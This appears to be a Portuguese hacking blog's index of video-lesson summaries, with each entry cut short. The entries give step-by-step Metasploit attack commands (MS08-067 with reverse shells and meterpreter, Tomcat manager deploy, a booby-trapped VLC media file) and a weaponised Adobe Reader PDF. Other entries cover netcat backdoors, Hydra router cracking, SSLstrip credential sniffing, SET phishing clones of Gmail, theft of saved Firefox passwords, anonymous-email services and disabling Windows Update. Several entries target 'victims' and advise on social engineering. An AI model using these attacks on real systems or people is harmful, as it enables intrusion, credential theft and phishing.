Invasão em micro Linux

Nessa aula mostro como explorar um serviço rodando em um micro Linux. O serviço era do apache tomcat. Para maiores informações do mesmo clique aqui!O que eu fiz?Escanei o host com o Nmap, verifiquei os serviço, fiz um scanner com o metasploit para verifica vulnerabilidade do login, peguei o login e senha e injetei o exploit.Comandos: Citação: nmap -sV hostuse scanner/http/tomcat_mgr_loginset rhost Ip_da_vitimaset rport 8180exploituse multi/http/tomcat_mgr_deployset rhost Ip_da_vitimaset username Login_capturadoset passwoer Senha_capturadaset...

Metagoofil

Metagoofil e uma ferramenta escrita em python que extrair arquivos (pdf, doc, xls, ppt) disponível no site alvo. Esse arquivos podem ser usando para varios tipos de ataque como por exemplo de ataque de forças-bruta, um simples exemplo e para ataque de força-bruta (vpn, ftp, webapps etc.), existem técnicas que nos permitem extrair mac dos arquivos e etc... . Com ele da para extrair vários tipos de arquivos (pdf, doc, xls, ppt, etc.), o resultado e gerado um html descritos os arquivos baixados e uma pasta contendo os mesmo.Comandos:Citação: #python...

Remote Desktop com VNC via metasploit

Mostro com acessar um desktop remotamente com VNC via metasploit uma de muitas ferramentas encontradas no metasploit.O que eu fiz?Configurei o metasploit para injetar uma carga vncinject usando o exploit ms08_067_netapiComandos: use exploit/windows/smb/ms08_067_netapiset RHOST IP_da_vitimaset PAYLOAD windows/vncinject/bind_tcexploit O ambiente da aula e numa distro linux "backtrack 4", mas pode ser usando em qualquer SO que rode metasploit.Baixar: http://www.4shared.com/file/olS5vapb/Remote_desktop_VNC.htmlAssisti on line: http://bli...

Vulnerabilidade no Adober Reader - CVE-2010-0188

Um hacker chamado villy fez um script python que vai criar um pdf que lançará calc.exe WinXP SP2 apos execução do "pdf" na versão mais atualizada do Adobe Reader que e a 9.3 mas funcionar nas versões 9.1 9.2 e 9.3 do Adobe Reader instalado, mesmo com Java desligado.Depois de brincar com ele que substituiu o shellcode com o Windows Shell Reverse e depois tentei em um sistema totalmente atualizado! E o que acontece? heheheExploit trabalha com Adobe Javascript desativado.Testado: testado com sucesso no Adobe Reader 9.1/9.2/9.3 OS Windows XP (SP2,...

Desabilitando a atualização do Windows

Mini tuto de como cancelar a atualização automática do Windows XP.Primeiro passo: Clique em "iniciar" > Executar... > "CMD"Segundo passo: Vamos parar o serviço de atualização, no prompt de comando digita a seguinte sintaxe:Citação: net stop wuauserv Terceiro passo: Após ter parado o serviço automático das atualizações de Windows vamos entrar no diretório do Windows usando a sintaxe abaixo:Citação: cd /d %windir% Quarto passo:...

Sites para envio de e-mail anônimos

SendAnonymousEmail – Este é um serviço gratuito que permite o envio ilimitado de emails anônimos.Deadfake – Em um ambiente muito familiar este site permite o envio de emails anônimos rico em detalhes(cores, fontes etc..).Note2email – Uma aplicação web que permite o envio de notas rápidas para todo o mundo.Fuzzmail – Sem cadastro nem nada, basta informar o email do destinatário, a menssagem e enviar.W3 – Outro serviço muito bom, não necessita cadastro, ao clicar no link você diretamente irá para a tela de edição.Anonymailer - O meu preferido com...

Tool list - Lista de ferramentas para iniciantes

Organização Sam Spade – http://www.samspade.org VisualRoute – http://www.visualroute.com Bidiblah – http://www.sensepost.com/research/bidiblah/ RedesScanline – http://www.packetstormsecurity.org/UNIX/netcat/ Nmap – http://www.insecure.org Firewalk – http://www.packetfactory.net/projects/firewalk/ Cain – http://www.oxid.it/cain.html Ethereal – http://www.ethereal.com/ DSniff – www.monkey.org/~dugsong/dsniff Scanrand – http://www.doxpara.com/read.php/code/paketto.html SolarWinds – www.solarwinds.net Ftester – http://dev.inversepath.com/trac/ftester...

Imagem do Windows Vista para Pen-Test

Imagem do Vista para teste de segurança de maneira profissional e legal perante a lei.Quais são os PCs Virtual (VPC), e qual é a diferença entre uma VPC e Virtual Hard Disk (VHD)?Virtual PC (VPC) é um produto Microsoft que permite aos usuários executar uma instância virtual de um sistema operativo (aka Virtual Hard Disk) já está em execução dentro de uma instância de um sistema operacional (SO aka não-virtual). O Virtual Hard Disk (VHD) pode utilizar o hardware do computador (por exemplo, disco rígido, placa Ethernet, portas USB) da mesma forma...

Video Demo - Vulnerabilidade da tecla F1

No dia 26 de fevereiro de 2010 foi notificado uma alerta de segurança aos usuários do sistema operacional Windows XP, para que pressionar a tecla F1, quando estivesse navegando pela internet com Internet Explorer, pois poderia ser vitima de um ataque possibilitando acesso total a maquina.“A vulnerabilidade existe no jeito que o VBScript interage com arquivos de ajuda do Windows usando o Internet Explorer”, diz o boletim. “Se um site malicioso mostrar uma caixa de diálogo e o usuário apertar a tecla F1, códigos arbitrários podem ser executados."O...

Metasploit - Sniffer via meterpreter

Essa video e sobre sniffer via meterpreter em um micro invadido.O que eu fiz?Invadir um micro usando Windows XP SP2 com o metasploit e rodei o modulo sniffer.Comando: Citação: use windows/smb/ms08_067_netapiset PAYLOAD windows/meterpreter/bind_tcpset RHOST IP_do_alvoexploituse sniffersniffer_interfacessniffer_start 1 200000sniffer_stats 1sniffer_dump 1 /local_destino_do_log.capsniffer_stop 1 Baixar: http://www.4shared.com/file/yI6r3wVP/Metasploit-meterprete_sniffer.htmlAssisti on-line: http://bhior.blip.tv/file/3629529...

Netcat - Backdoor e transferindo arquivos

Nessa aula mostro como usar o netcat com backdoor de sistema operacional Linux e Windows e como transferir arquivos com mesmo pela rede.Comandos: nc -l - Para fica em modo listen "escutar"-p - Para especificar a porta-e - Para conectar ao interpretador de comandos do sistema> - Saída de arquivos < - Entrada de arquivos Programa:Netcathttp://www.downloadnetcat.com/Baixar: Versão windows > Download Netcat Windows VersionVersão Linux (Source Tarball) > http://www.downloadnetcat.com/netcat-0.7.1.tar.gzVersão LInux...

Pent-test - Varredura com nmap, brute-force e consumando acesso e coletando informação

Ola pessoal nessa aula basicamente como quebrar senha de roteadores "router".O que eu fiz?# Obter endereço de IP# Check gateway IP# Verifique o caminho da página de configuração do roteador está utilizando# Hydra - usando wordlists para quebrar o login e senha do roteador.# Acessar o host remoto# Capturar senha memorizado do mesmo.Descrevendo...Primeiro usei o nmap para fazer varredura em uma faixa de IP´s, com a seguinte sintaxe:-sV - portas abertas para determinar o serviço/info versão-T - Estabelece um padrão de temporização, no caso em questão...

Sniffer SSL - https

Nesta video vou mostrar como a criptografia SSL não e seguro. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafico da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).Programas usados:Programas usados:SSLstripARPspoofEttercapComando usados: Citação: kate /etc/etter.conf* Descemente a opção do iptables,...

Metasploit - Explorando falha MS08-067

Nessa video aula mostro como usar o metasploit para explorar falha de segurança no sistema operacional Windows XP profissional sp2, que permite execução remota.Programas usados:Metasploit framework 3NmapExploit usado: Citação: ms08_067_netapi Payload(carga) usado: Citação: shell_reverse_tcp Tudo encontrado no BackTrack 4.Solução da falha: Clique aquiComandos: Citação: nmap -sS -O Ip_do_alvocd /pentest/exploits/framework3./msfconsoleshow exploitsuse windown/smb/ms08_067_netapishow...

Craqueando senhas .rar com cRARk

vídeo aula mostra como quebrar senha de arquivos .rar. Vídeo simples, mostro apenas o uso básico do cRARk.Programa usado:cRACk: http://www.crark.net/#downloadManual: http://www.crark.net/cRARk.htmlPrograma pode ser usando para os SO Windows, Linux e Mac.Instalação no BackTrack 4: Citação: #apt-get install crark Baixar: http://www.4shared.com/file/KScFAiKc/Quebrando_senha_rar.htmlAssistir on-line: http://bhior.blip.tv/file/3529...

Metasploit GUI - Explorando falha MS08-067

Nessa video aula mostro uma técnica de penetração em um maquina usando windows XP sp2 via metasploit, para o pessoal do fórum que vem acompanhando vídeo anteriores minhas, perceberam que fiz tudo em modo texto, creio que a maioria dos usuários tem uma certa dificuldade ainda em lida com esse modo. Pensando nisso resolvi mostra em modo gráfico.Na vídeo aula não mostrei como detectar o SO rodando no determinado host, isso pode ser feito com o nmap "nmap -O IP_alvo", para quem vem acompanhando minha vídeo ja poderão perceber isso.Obs: Na hora de...

Configurando sistema operacional para não reponder a "ping" pacotes icmp

Na vídeo mostro em dois sistema operacionais, Windows e Linux.Comando linux: Citação: Você pode usar um editor de texto ou no shell:echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all Comandos windows: Citação: Iniciar > Painel de controle > Central de segurança > Firewall do Windows > Avançado > Configurações > ICMP Baixar: http://www.4shared.com/file/bSWtpcWF/desabilitar_icmp.htmlAssistir on-line: http://bhior.blip.tv/file/3534...

Fast-track Autopowning WebGUI (metasploit&nmap)

Fast-track Autopowning e um ataque automatizado do mesmo com metasploit e nmap.O que eu fiz?Simplesmente add o host e selecionei o payload, o resto o programa faz tudo...Programas usandos:Fast-track (Metasploit&nmap)*Todos agregados ao back-track 4Baixar: http://www.4shared.com/file/NpyZwhCX/Fast-track-Autopowning-webGUI_.htmlAssisti on-line: http://bhior.blip.tv/file/3607...

Hack Firefox - Metasploit - exploração via meterpreter

Nessa vídeo aula e de como pegar senha salvas no mozilla firefox em um micro invadido, no caso da vídeo, o micro rodava o Sistema operacional windows XP professional sp2. Depois de pega os arquivos do firefox, usei um programa para descriptografar e ter acesso as senhas memorizadas do navegador mozilla(Lembrado que e necessário todos os arquivo mostrados)...O aplicativo e para Windows mais foi bem emulado pelo wine no linux. So não fiz a vídeo no Windows porque não tinha a maquina virtual instalada, iria demorar um pouco, então resolvi fazer no...

Cracking HTTP Passwords - Hydra

Nessa vídeo aula mostro o uso básico do hydra para quebrar senha http de um roteador. Fiz basicamente um ataque conhecido com "Ataque de dicionario" usando uma wordlist (Lista de palavras) para testa senhas em clientes remotos pode ser feito em 1 ou mais clientes.Comandos: Citação: -l = usuário-P = Senha (direcionei para uma wordlist)-e ns = fazer checagem 'null' password-t xx= Executa muitas tarefas de uma só vez.-f = sair, uma vez que encontra o primeiro usuário/senha-s = conectar via SSL-vV = modo verbose (mostra mais informações)192.168.1.1...

Explorando vulnerabilidade no Player VLC - Metasploit

Nessa vídeo aula, mostro com explorar uma vulnerabilidade no VLC, esse ataque tem que ser usando com uma boa engenharia social. Criei um arquivos no metasploit chamado msf.ty onde podemos renomeá para qualquer arquivo suportado pelo VLC, no caso em questão usei .mp3. Com o arquivo enviado para vitima, quando a vitima executar no VLC entro dentro da maquina.Comandos: Citação: use windows/fileformat/videolan_tivoset payload windows/shell/reverse_tcpset lhost Meu_IPset rport 1975use exploit/multi/handlerset payload windows/shell/reverse_tcp...

Nessa video aula, mostro com explorar uma vulnerabilidade no VLC, esse ataque tem que ser usando com uma boa engenharia social. Criei um arquivos no metasploit chamado msf.ty onde podemos renomeá para qualquer arquivo suportado pelo VLC, no caso em questão usei .mp3. Com o arquivo enviado para vitima, quando a vitima executar no VLC entro dentro da maquina.Comandos: Citação: use windows/fileformat/videolan_tivoset payload windows/shell/reverse_tcpset lhost Meu_IPset rport 1975use exploit/multi/handlerset payload windows/shell/reverse_tcp...

Hijacking com o SET - Social Engineering Toolkit

Nessa vídeo aula mostra a técnica de hijacking por meio do SET, existem outras formas de executa-las.Como vocês vão poder observar na vídeo, clonei um site de minha preferencia com auxilio da SET, demonstrei uma forma de usar ES na vitima para que ele entre no link enviador pele atacante, a engenharia social vai contar muito nessa hora.Como vão pode ver claramente ele clonar o site perfeitamente e apos o login no site alvo (Gmail), alem da captura da senha a vitima a mesma consegue logar normalmente no seu servidor web...

Ataque automatizado com Metasploit & Nmap

Bom pessoal, nessa vídeo aula mostro como cria um base de dados para um ataque automatizado usando usando resultados do nmap.A primeira coisa que eu fiz foi verificar quantos hosts estavam em minha disponível em minha rede com o comando: nmap 10.1.1.1-100 Ele me mostra o resultado de de todas as maquinas que estão com ip 10.1.1.1, 10.1.1.2, 10.1.1.3 e assim sucessivamente ate o 10.1.1.100.Nos mostrou 3 hosts:1- Meu roteador D-link com 3 portas abertas2- Minha maquina, com todas as portas fechadas3- Maquina virtual usando...